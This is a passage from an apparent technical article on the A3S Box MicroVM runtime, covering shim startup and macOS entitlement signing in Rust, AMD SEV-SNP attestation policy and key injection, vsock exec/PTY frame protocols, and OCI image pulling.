        &lt;span class="nf"&gt;ensure_entitlement&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;shim_path&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="o"&gt;?&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

        &lt;span class="c1"&gt;// 3. Serialize configuration&lt;/span&gt;
        &lt;span class="k"&gt;let&lt;/span&gt; &lt;span class="n"&gt;config_json&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nn"&gt;serde_json&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="nf"&gt;to_string&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;spec&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="o"&gt;?&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

        &lt;span class="c1"&gt;// 4. Start shim subprocess&lt;/span&gt;
        &lt;span class="k"&gt;let&lt;/span&gt; &lt;span class="n"&gt;child&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nn"&gt;Command&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="nf"&gt;new&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;shim_path&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="nf"&gt;.arg&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"--config"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="nf"&gt;.arg&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;config_json&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="nf"&gt;.stdin&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nn"&gt;Stdio&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="nf"&gt;null&lt;/span&gt;&lt;span class="p"&gt;())&lt;/span&gt;
            &lt;span class="nf"&gt;.spawn&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;&lt;span class="o"&gt;?&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

        &lt;span class="c1"&gt;// 5. Return ShimHandler&lt;/span&gt;
        &lt;span class="nf"&gt;Ok&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nn"&gt;Box&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="nf"&gt;new&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nn"&gt;ShimHandler&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="nf"&gt;from_child&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;child&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="o"&gt;?&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Shim location strategy&lt;/strong&gt; (&lt;code&gt;find_shim&lt;/code&gt;) searches in priority order:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Same directory as the current executable&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;~/.a3s/bin/&lt;/code&gt; user directory&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;target/debug&lt;/code&gt; or &lt;code&gt;target/release&lt;/code&gt; (development mode)&lt;/li&gt;
&lt;li&gt;System &lt;code&gt;PATH&lt;/code&gt;
&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;This multi-level search strategy ensures the shim binary can be correctly found in development, testing, and production environments.&lt;/p&gt;

&lt;h3&gt;
  
  
  9.3 macOS Entitlement Signing
&lt;/h3&gt;

&lt;p&gt;On macOS, using Apple Hypervisor Framework (HVF) requires the binary to have the &lt;code&gt;com.apple.security.hypervisor&lt;/code&gt; entitlement. A3S Box handles this automatically:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight rust"&gt;&lt;code&gt;&lt;span class="k"&gt;fn&lt;/span&gt; &lt;span class="nf"&gt;ensure_entitlement&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;shim_path&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;Path&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;Result&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="c1"&gt;// Use file lock to prevent concurrent signing race conditions&lt;/span&gt;
    &lt;span class="k"&gt;let&lt;/span&gt; &lt;span class="n"&gt;lock&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nn"&gt;FileLock&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="nf"&gt;new&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;shim_path&lt;/span&gt;&lt;span class="nf"&gt;.with_extension&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"lock"&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;&lt;span class="o"&gt;?&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;let&lt;/span&gt; &lt;span class="n"&gt;_guard&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;lock&lt;/span&gt;&lt;span class="nf"&gt;.lock&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;&lt;span class="o"&gt;?&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="c1"&gt;// Check if already signed&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nf"&gt;has_entitlement&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;shim_path&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"com.apple.security.hypervisor"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="o"&gt;?&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nf"&gt;Ok&lt;/span&gt;&lt;span class="p"&gt;(());&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="c1"&gt;// Sign with codesign&lt;/span&gt;
    &lt;span class="nn"&gt;Command&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="nf"&gt;new&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"codesign"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="nf"&gt;.args&lt;/span&gt;&lt;span class="p"&gt;([&lt;/span&gt;&lt;span class="s"&gt;"--sign"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"-"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"--entitlements"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;entitlements_plist&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; 
               &lt;span class="s"&gt;"--force"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;shim_path&lt;/span&gt;&lt;span class="nf"&gt;.to_str&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;&lt;span class="nf"&gt;.unwrap&lt;/span&gt;&lt;span class="p"&gt;()])&lt;/span&gt;
        &lt;span class="nf"&gt;.status&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;&lt;span class="o"&gt;?&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="nf"&gt;Ok&lt;/span&gt;&lt;span class="p"&gt;(())&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The file lock mechanism ensures that no signing race conditions occur when multiple A3S Box instances start simultaneously.&lt;/p&gt;

&lt;h3&gt;
  
  
  9.4 Graceful Shutdown and Forced Termination
&lt;/h3&gt;

&lt;p&gt;VM shutdown follows a two-phase protocol:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Graceful shutdown&lt;/strong&gt;: Send the configured signal (default SIGTERM) to the shim process, then poll &lt;code&gt;try_wait()&lt;/code&gt; every 50ms, waiting up to &lt;code&gt;timeout_ms&lt;/code&gt; (default 10,000ms).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Forced termination&lt;/strong&gt;: If still not exited after timeout, escalate to SIGKILL.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Exit code collection&lt;/strong&gt;: Collect the subprocess exit code via &lt;code&gt;wait()&lt;/code&gt;.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;For attached mode (without a Child handle), use &lt;code&gt;libc::waitpid&lt;/code&gt; with the &lt;code&gt;WNOHANG&lt;/code&gt; flag for non-blocking polling.&lt;/p&gt;




&lt;h2&gt;
  
  
  10. TEE Confidential Computing: The Trust Chain from Hardware to Application
&lt;/h2&gt;

&lt;h3&gt;
  
  
  10.1 Building the Trust Chain
&lt;/h3&gt;

&lt;p&gt;The core challenge of confidential computing is: &lt;strong&gt;How do we establish trust in the runtime environment inside a MicroVM without trusting the host machine?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;A3S Box solves this through the following trust chain:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;AMD Silicon (Physical Hardware)
    |
    +-- PSP (Platform Security Processor)
    |   +-- Manages AES encryption keys for each VM
    |
    +-- ARK (AMD Root Key) -- hardcoded in chip
    |   +-- ASK (AMD SEV Key) -- intermediate CA
    |       +-- VCEK (Versioned Chip Endorsement Key) -- chip unique
    |           +-- SNP Report Signature -- attestation report signature
    |
    +-- Measurement (SHA-384)
        +-- Hash of initial guest memory
            +-- Proves code loaded at VM startup has not been tampered with
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The root anchor of this trust chain is AMD's physical silicon — which cannot be forged by software. From silicon to attestation report, every step has cryptographic guarantees.&lt;/p&gt;

&lt;h3&gt;
  
  
  10.2 Attestation Policy Engine
&lt;/h3&gt;

&lt;p&gt;A3S Box implements a flexible attestation policy engine (&lt;code&gt;AttestationPolicy&lt;/code&gt;), allowing verifiers to customize verification rules according to their security requirements:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight rust"&gt;&lt;code&gt;&lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;AttestationPolicy&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="cd"&gt;/// Expected initial memory hash (SHA-384)&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;expected_measurement&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;Option&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nb"&gt;u8&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="mi"&gt;48&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;

    &lt;span class="cd"&gt;/// Minimum TCB version requirement&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;min_tcb&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;Option&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="n"&gt;TcbVersion&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;

    &lt;span class="cd"&gt;/// Whether to require non-debug mode (should be true in production)&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;require_no_debug&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;bool&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;

    &lt;span class="cd"&gt;/// Whether to require SMT disabled (prevents side-channel attacks)&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;require_no_smt&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;bool&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;

    &lt;span class="cd"&gt;/// Allowed policy mask&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;allowed_policy_mask&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;Option&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nb"&gt;u64&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;

    &lt;span class="cd"&gt;/// Maximum report validity period (seconds)&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;max_report_age_secs&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;Option&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nb"&gt;u64&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Policy verification returns &lt;code&gt;PolicyResult&lt;/code&gt;, containing pass/fail status and a specific list of violations (&lt;code&gt;Vec&amp;lt;PolicyViolation&amp;gt;&lt;/code&gt;). This design allows verifiers to precisely understand which policies were violated, rather than a simple "pass/fail."&lt;/p&gt;

&lt;h3&gt;
  
  
  10.3 Re-attestation Mechanism
&lt;/h3&gt;

&lt;p&gt;The security of a TEE environment is not a one-time thing — it requires continuous verification. A3S Box implements a periodic re-attestation mechanism:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight rust"&gt;&lt;code&gt;&lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;ReattestConfig&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="cd"&gt;/// Check interval (default 300 seconds)&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;interval_secs&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;u64&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;

    &lt;span class="cd"&gt;/// Maximum consecutive failures (default 3)&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;max_failures&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;u32&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;

    &lt;span class="cd"&gt;/// Grace period after startup (default 60 seconds)&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;grace_period_secs&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;u64&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Re-attestation state tracking includes: startup time, last success time, last check time, consecutive failure count, and total count. When the consecutive failure count reaches the threshold, the system performs the corresponding action based on configuration:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Warn&lt;/strong&gt;: Log warning and emit event&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Event&lt;/strong&gt;: Send security event to event bus&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Stop&lt;/strong&gt;: Stop the MicroVM&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  10.4 Key Injection Flow
&lt;/h3&gt;

&lt;p&gt;In a TEE environment, keys cannot be passed through ordinary environment variables or file mounts (because the host is untrusted). A3S Box implements secure key injection via RA-TLS:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;After the MicroVM starts, the Attestation server listens on vsock port 4091&lt;/li&gt;
&lt;li&gt;The Key Broker Service (KBS) connects to the MicroVM via RA-TLS&lt;/li&gt;
&lt;li&gt;During the TLS handshake, the MicroVM's certificate contains the SNP attestation report&lt;/li&gt;
&lt;li&gt;KBS verifies the attestation report (measurement, TCB version, policy compliance)&lt;/li&gt;
&lt;li&gt;After verification passes, KBS sends keys through the encrypted channel&lt;/li&gt;
&lt;li&gt;Guest Init writes keys to &lt;code&gt;/run/secrets/&lt;/code&gt; (tmpfs, permissions 0400)&lt;/li&gt;
&lt;li&gt;Application processes read keys from &lt;code&gt;/run/secrets/&lt;/code&gt;
&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Throughout the entire process, keys never appear in plaintext outside the MicroVM.&lt;/p&gt;




&lt;h2&gt;
  
  
  11. Vsock Communication Protocol: The Bridge Between Host and Guest
&lt;/h2&gt;

&lt;h3&gt;
  
  
  11.1 Why Vsock?
&lt;/h3&gt;

&lt;p&gt;In a MicroVM architecture, an efficient communication channel is needed between the host and guest. Traditional options include:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Network (TCP/IP)&lt;/strong&gt;: Requires configuring virtual network interfaces, adding complexity and attack surface&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Shared memory&lt;/strong&gt;: High performance but difficult to implement securely&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Serial port&lt;/strong&gt;: Simple but extremely low bandwidth&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;vsock (Virtio Socket)&lt;/strong&gt;: A socket interface designed specifically for VM communication, requiring no network configuration&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Advantages of vsock:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Zero configuration&lt;/strong&gt;: No IP addresses, routing tables, or firewall rules needed&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Secure&lt;/strong&gt;: The communication channel does not go through the network stack and cannot be intercepted by network-layer attackers&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;High performance&lt;/strong&gt;: virtio-based shared memory transport with extremely low latency&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Simple&lt;/strong&gt;: Uses standard socket API (&lt;code&gt;AF_VSOCK&lt;/code&gt;), programming model similar to TCP&lt;/li&gt;
&lt;/ol&gt;

&lt;h3&gt;
  
  
  11.2 Port Allocation
&lt;/h3&gt;

&lt;p&gt;A3S Box allocates four dedicated ports on vsock:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Port&lt;/th&gt;
&lt;th&gt;Service&lt;/th&gt;
&lt;th&gt;Direction&lt;/th&gt;
&lt;th&gt;Protocol&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;4088&lt;/td&gt;
&lt;td&gt;gRPC Agent control&lt;/td&gt;
&lt;td&gt;Bidirectional&lt;/td&gt;
&lt;td&gt;Protobuf&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4089&lt;/td&gt;
&lt;td&gt;Exec server&lt;/td&gt;
&lt;td&gt;Host-&amp;gt;Guest&lt;/td&gt;
&lt;td&gt;JSON + binary frames&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4090&lt;/td&gt;
&lt;td&gt;PTY server&lt;/td&gt;
&lt;td&gt;Bidirectional&lt;/td&gt;
&lt;td&gt;Binary frames&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4091&lt;/td&gt;
&lt;td&gt;Attestation server&lt;/td&gt;
&lt;td&gt;Host-&amp;gt;Guest&lt;/td&gt;
&lt;td&gt;RA-TLS&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  11.3 Binary Frame Protocol
&lt;/h3&gt;

&lt;p&gt;Exec and PTY servers use a unified binary frame format:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;+----------+--------------+---------------------+
| type: u8 | length: u32  | payload: [u8; len]  |
| (1 byte) | (4 bytes BE) | (variable length)   |
+----------+--------------+---------------------+
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Maximum frame payload is 64 KiB. This limit is a deliberate tradeoff: large enough to efficiently transfer data, yet small enough to avoid memory pressure.&lt;/p&gt;

&lt;h3&gt;
  
  
  11.4 Exec Protocol in Detail
&lt;/h3&gt;

&lt;p&gt;The Exec protocol supports two modes:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Non-streaming mode&lt;/strong&gt;: For short commands (e.g., &lt;code&gt;cat /etc/hostname&lt;/code&gt;)&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Host --&amp;gt; [ExecRequest JSON] --&amp;gt; Guest
Host &amp;lt;-- [ExecOutput JSON]  &amp;lt;-- Guest

ExecRequest {
    cmd: ["cat", "/etc/hostname"],
    timeout_ns: 5_000_000_000,  // 5 seconds
    env: {"KEY": "VALUE"},
    working_dir: "/app",
    user: "nobody",
    streaming: false
}

ExecOutput {
    stdout: "my-hostname\n",
    stderr: "",
    exit_code: 0
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Each stream (stdout/stderr) has a maximum of 16 MiB.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Streaming mode&lt;/strong&gt;: For long-running commands or scenarios requiring real-time output&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Host --&amp;gt; [ExecRequest JSON, streaming: true] --&amp;gt; Guest
Host &amp;lt;-- [ExecChunk: type=0x01, Stdout]       &amp;lt;-- Guest
Host &amp;lt;-- [ExecChunk: type=0x01, Stderr]       &amp;lt;-- Guest
Host &amp;lt;-- [ExecChunk: type=0x01, Stdout]       &amp;lt;-- Guest
...
Host &amp;lt;-- [ExecExit: type=0x02, exit_code]     &amp;lt;-- Guest
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Streaming mode also supports file transfer:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;FileRequest {
    op: Upload | Download,
    guest_path: "/data/file.txt",
    data: "base64_encoded_content"  // for Upload
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  11.5 PTY Protocol in Detail
&lt;/h3&gt;

&lt;p&gt;The PTY protocol is designed for interactive terminal sessions, supporting full terminal emulation:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Frame types:
  0x01 - Request  (Host-&amp;gt;Guest: start PTY session)
  0x02 - Data     (Bidirectional: terminal data)
  0x03 - Resize   (Host-&amp;gt;Guest: terminal window size change)
  0x04 - Exit     (Guest-&amp;gt;Host: process exit)
  0x05 - Error    (Guest-&amp;gt;Host: error message)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;PTY session establishment flow:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Host sends &lt;code&gt;PtyRequest&lt;/code&gt; (containing command, environment variables, initial window size)&lt;/li&gt;
&lt;li&gt;Guest Init calls &lt;code&gt;openpty()&lt;/code&gt; to allocate a PTY pair&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;fork()&lt;/code&gt; creates a child process:

&lt;ul&gt;
&lt;li&gt;Child process: &lt;code&gt;setsid()&lt;/code&gt; -&amp;gt; set controlling terminal -&amp;gt; redirect stdio -&amp;gt; &lt;code&gt;execvp()&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;Parent process: bidirectional data forwarding between vsock and PTY master via &lt;code&gt;poll()&lt;/code&gt; multiplexing&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Terminal window size changes are passed via &lt;code&gt;TIOCSWINSZ&lt;/code&gt; ioctl&lt;/li&gt;
&lt;li&gt;When the child process exits, drain the PTY buffer and send a &lt;code&gt;PtyExit&lt;/code&gt; frame&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;This design makes the &lt;code&gt;a3s-box exec -it my-app /bin/bash&lt;/code&gt; experience identical to &lt;code&gt;docker exec -it&lt;/code&gt; — supporting Tab completion, arrow key history, Ctrl+C signal forwarding, window size adaptation, and all other terminal features.&lt;/p&gt;




&lt;h2&gt;
  
  
  12. OCI Image Processing Pipeline: From Registry to Root Filesystem
&lt;/h2&gt;

&lt;h3&gt;
  
  
  12.1 The Complete Image Pull Chain
&lt;/h3&gt;

&lt;p&gt;OCI (Open Container Initiative) images are the universal language of the container ecosystem. A3S Box fully implements the OCI image specification, allowing any standards-compliant container image to run directly in a MicroVM.&lt;/p&gt;

&lt;p&gt;The complete image pull flow:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;User request (a3s-box pull nginx:latest)
    |
    v
ImageReference parsing
    |  registry: registry-1.docker.io
    |  repository: library/nginx
    |  tag: latest
    |
    v
ImagePuller (cache-first strategy)
    |
    +-- Cache hit? --&amp;gt; Return local path directly
    |       |
    |       +-- Lookup by reference (tag match)
    |       +-- Lookup by digest (content dedup)
    |
    +-- Cache miss --&amp;gt; RegistryPuller
                    |
                    +-- Authentication (RegistryAuth)
                    |   +-- Anonymous
                    |   +-- Basic (username/password)
                    |   +-- Environment variables (REGISTRY_USERNAME/PASSWORD)
                    |   +-- CredentialStore (Docker config.json)
                    |
                    +-- Multi-arch resolution (linux_platform_resolver)
                    |   +-- x86_64 -&amp;gt; amd64
                    |   +-- aarch64 -&amp;gt; arm64
                    |
                    +-- Pull manifest + config + layers
                    |
                    +-- Store in ImageStore
                        +-- Capacity eviction (LRU)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  12.2 Image Reference Parsing
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;ImageReference&lt;/code&gt; is the core type for image identification, responsible for parsing various user input formats into a standardized structure:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight rust"&gt;&lt;code&gt;&lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;ImageReference&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;registry&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;String&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;       &lt;span class="c1"&gt;// e.g., "registry-1.docker.io"&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;repository&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;String&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;     &lt;span class="c1"&gt;// e.g., "library/nginx"&lt;/span&gt;
